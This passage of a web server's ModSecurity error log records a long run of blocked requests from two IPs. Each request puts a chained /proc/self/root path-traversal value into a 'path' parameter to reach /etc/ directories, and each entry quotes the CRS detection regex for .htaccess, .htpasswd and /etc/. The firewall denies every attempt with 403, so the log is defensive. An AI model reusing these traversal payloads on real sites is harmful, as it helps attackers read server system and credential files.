"OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGJf9ocpUE4ed4uDzgkQAAAgs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:31:18.994593 2026] [:error] [pid 32654:tid 140411666392832] [client 74.7.243.203:44204] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGJglT9VtDQc7bgUyf2QAAAQk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:31:20.663833 2026] [:error] [pid 32654:tid 140411691570944] [client 74.7.241.46:54568] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGKAlT9VtDQc7bgUyf3AAAAQY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:31:21.379592 2026] [:error] [pid 10651:tid 140411741927168] [client 74.7.243.203:49320] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGKbysWC90G-1nBrA4eAAAAYA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:31:23.350783 2026] [:error] [pid 32654:tid 140411582465792] [client 74.7.241.46:54580] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGKwlT9VtDQc7bgUyf4gAAARM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:31:23.623187 2026] [:error] [pid 32654:tid 140411540502272] [client 74.7.243.203:49334] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGKwlT9VtDQc7bgUyf4wAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:31:24.622192 2026] [:error] [pid 32654:tid 140411649607424] [client 74.7.241.46:54594] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGLAlT9VtDQc7bgUyf5AAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:31:28.338457 2026] [:error] [pid 21533:tid 140411658000128] [client 74.7.241.46:54608] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGMHjZBu2q05ozVU9I1gAAAUo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:31:29.647570 2026] [:error] [pid 21805:tid 140411590858496] [client 74.7.241.46:54350] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGMbABkC4fWIHEf8HfQAAAAFI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:31:30.847297 2026] [:error] [pid 21533:tid 140411540502272] [client 74.7.241.46:54354] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGMnjZBu2q05ozVU9I1wAAAVg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:31:35.212625 2026] [:error] [pid 32654:tid 140411616036608] [client 74.7.241.46:54358] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGNwlT9VtDQc7bgUyf8gAAAQ8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:31:37.554365 2026] [:error] [pid 21806:tid 140411565680384] [client 74.7.241.46:54372] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGOdSswJuvopo3lOhTFgAAAJU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:31:42.134884 2026] [:error] [pid 11972:tid 140411599251200] [client 74.7.241.46:44122] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGPpqj1wV0Si-OkefdJAAAABE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:31:42.376459 2026] [:error] [pid 32654:tid 140411699963648] [client 74.7.243.203:49350] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGPglT9VtDQc7bgUyf-wAAAQU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:31:43.409117 2026] [:error] [pid 11972:tid 140411699963648] [client 74.7.241.46:44130] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGP5qj1wV0Si-OkefdJQAAAAU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:31:44.602246 2026] [:error] [pid 10709:tid 140411699963648] [client 74.7.241.46:44144] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGQBXjF1vJNtV6CWrseAAAAcU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:31:52.351308 2026] [:error] [pid 21805:tid 140411674785536] [client 74.7.241.46:44154] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGSLABkC4fWIHEf8HfXAAAAEg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:31:53.659135 2026] [:error] [pid 10651:tid 140411624429312] [client 74.7.241.46:35212] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGSbysWC90G-1nBrA4hQAAAY4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:31:54.843661 2026] [:error] [pid 10651:tid 140411725141760] [client 74.7.241.46:35214] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGSrysWC90G-1nBrA4hgAAAYI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:31:56.117065 2026] [:error] [pid 11972:tid 140411725141760] [client 74.7.241.46:35220] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGTJqj1wV0Si-OkefdJgAAAAI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:32:08.650560 2026] [:error] [pid 10709:tid 140411708356352] [client 74.7.243.203:60986] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGWBXjF1vJNtV6CWrskwAAAcQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:32:08.752199 2026] [:error] [pid 21533:tid 140411540502272] [client 74.7.241.46:35222] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGWHjZBu2q05ozVU9I6AAAAVg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:32:12.144151 2026] [:error] [pid 10831:tid 140411632822016] [client 74.7.241.46:32884] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGXI6lpbStxTqkSktg1gAAAk0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
